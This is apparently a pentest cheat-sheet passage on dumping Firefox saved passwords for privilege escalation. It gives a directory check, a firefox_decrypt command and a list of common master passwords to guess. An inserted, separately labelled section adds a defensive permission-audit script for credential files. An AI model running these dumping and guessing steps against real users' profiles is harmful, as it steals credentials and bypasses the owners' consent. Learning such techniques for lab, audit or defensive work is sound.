
Firefox Credentials Dumping

Last modified: 2024-10-03

A user's .mozilla directory contains a firefox directory that stores that user's saved credentials. We may dump the credentials and use them to escalate privileges.

Investigation

If there is a .mozilla/firefox directory in some user's home directory, we can dump credentials. So check this directory:

ls -al /home/<user>/.mozilla/
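
From the defender's side, the same directory check can be run as a permission audit. The script below is an added example, not part of the original page: it flags Firefox credential stores whose file modes let accounts other than the owner read them. The function names `loose` and `audit_firefox_profiles` are hypothetical, and it assumes the usual profile layout with saved logins in logins.json and the key database in key4.db.

```shell
#!/bin/sh
# Added example: audit Firefox credential stores for loose permissions.
# Assumed layout: <root>/<user>/.mozilla/firefox/<profile>/{logins.json,key4.db}

# loose PATH r|x: succeeds if group or others hold that permission bit on PATH.
loose() {
    mode=$(ls -ld "$1" | cut -c1-10)      # e.g. -rw-r--r--
    case "$2" in
        r) case "$mode" in ????r?????|???????r??) return 0 ;; esac ;;
        x) case "$mode" in ??????[xs]???|?????????[xt]) return 0 ;; esac ;;
    esac
    return 1
}

# audit_firefox_profiles [ROOT]: prints "EXPOSED <file>" when the file and every
# directory between it and ROOT are open to group or others, and "SHIELDED <file>"
# when the file mode is loose but a restrictive parent directory blocks access.
# Conservative: group and other bits are treated alike, so it may over-report.
audit_firefox_profiles() {
    root=$(cd "${1:-/home}" && pwd) || return 1
    find "$root" -type f -path '*/.mozilla/firefox/*' \
        \( -name logins.json -o -name key4.db \) 2>/dev/null |
    while IFS= read -r f; do
        loose "$f" r || continue          # owner-only file: nothing to report
        verdict=EXPOSED
        dir=$(dirname "$f")
        while [ "$dir" != "$root" ] && [ "$dir" != / ]; do
            loose "$dir" x || { verdict=SHIELDED; break; }
            dir=$(dirname "$dir")
        done
        printf '%s %s\n' "$verdict" "$f"
    done
}
```

Run `audit_firefox_profiles /home` with enough privilege to read every home directory; tightening the home or profile directory to mode 700 clears an EXPOSED finding.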

Dump Passwords from Firefox Profile

To decrypt the passwords saved in a profile, use firefox_decrypt:

python3 firefox_decrypt.py .mozilla/firefox/<id>

If we are asked for the master password and we don't know it, try common passwords:

admin
password
password1
password123
root